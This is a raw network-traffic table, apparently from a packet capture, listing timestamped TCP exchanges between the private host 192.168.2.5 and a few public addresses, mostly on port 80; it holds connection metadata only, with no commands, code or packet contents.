Sep 27, 2024 04:21:18.005341053 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005342007 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005352974 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005362988 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005366087 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005374908 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005382061 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005386114 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005397081 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005399942 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005414963 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005422115 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005446911 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005486012 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005496979 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005511045 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005515099 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005522013 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005537033 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005554914 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005614042 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005625010 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005636930 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005650043 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005650043 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005655050 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005661964 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005671978 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005672932 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005683899 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005686045 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005703926 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005728006 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005783081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.005815029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.005817890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.005825996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.005851030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.005861998 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.005861998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.005861998 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.005897045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.005897045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.005968094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.006267071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.006325006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.006408930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010324001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010340929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010351896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010360956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010361910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010375023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010385990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010389090 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010389090 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010401011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010413885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010426044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010433912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010433912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010457039 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010467052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010478020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010478020 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010478020 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010489941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010510921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010510921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010535002 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010545969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010556936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010567904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.010611057 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.010611057 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.011670113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.011692047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.011703968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.011737108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.011743069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.011743069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.011743069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.011749029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.011779070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.011790037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.011800051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.011821985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.011821985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.011905909 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.012386084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.012398005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.012408018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.012427092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.012438059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.012445927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.012445927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.012454033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.012465954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.012486935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.012486935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.012526989 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.012556076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.012661934 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.012981892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013021946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013031960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013044119 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013084888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013097048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013125896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013125896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013181925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013269901 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013307095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013318062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013328075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013339043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013339043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013339043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013353109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013361931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013361931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013371944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013384104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013395071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013395071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013395071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013406038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013417006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013427973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013427973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013514996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013525963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013537884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013550043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013550043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013555050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013566017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013577938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013603926 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013603926 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013652086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013690948 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013690948 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013822079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013874054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013885021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013896942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.013902903 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013938904 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013938904 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.013946056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.014009953 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.014010906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.014024019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.014122963 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.039364100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.039376974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.039397001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.039433956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.039446115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.039449930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.039449930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.039458990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.039470911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.039505959 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.039505959 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042289019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042315960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042329073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042341948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042350054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042350054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042354107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042367935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042387009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042401075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042401075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042424917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042437077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042448997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042457104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042457104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042460918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042474031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042485952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042490005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042500973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042531013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042531013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042593002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042634010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042637110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042721033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042764902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042764902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042793036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042805910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042820930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042831898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042846918 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042846918 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042881012 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042881012 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.042911053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.042943954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.044482946 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:18.046521902 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046572924 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046602011 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046611071 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046622038 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046637058 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046648026 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046658993 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046659946 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046670914 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046681881 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046706915 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046722889 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046735048 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046746016 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046761990 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046768904 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046773911 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046783924 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046786070 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046797991 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046802998 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046809912 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046833038 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046834946 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046850920 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046860933 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046861887 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046873093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046884060 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046884060 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046906948 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046906948 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046917915 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046937943 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046945095 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046947956 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046958923 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.046967983 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.046982050 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047003984 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047044992 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047063112 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047075033 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047085047 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047090054 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047099113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047108889 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047108889 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047147989 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047194004 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047210932 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047221899 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047233105 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047243118 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047245979 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047255039 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047265053 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047266960 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047283888 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047300100 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047307014 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047399044 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047472954 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047483921 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047496080 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047506094 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047508001 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047518015 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047528982 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047530890 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047540903 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047552109 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047563076 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047581911 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047660112 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047710896 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047727108 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047744036 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047753096 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047755957 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047768116 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047775030 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047777891 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047789097 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047805071 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047807932 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047816038 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047826052 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047835112 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047837973 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047848940 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047849894 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047861099 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047871113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047878981 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047904968 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047914982 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047925949 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047936916 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047947884 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047954082 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047959089 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047969103 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.047981024 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047991991 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.047993898 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.048017025 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.048041105 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.049459934 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.049469948 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.049480915 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.049508095 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.049527884 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.049540997 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.049552917 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.049562931 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.049573898 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.049575090 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.049585104 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.049588919 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.049607038 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.049631119 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.060071945 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:18.060585022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.060604095 CEST	80	49725	185.215.113.117	192.168.2.5
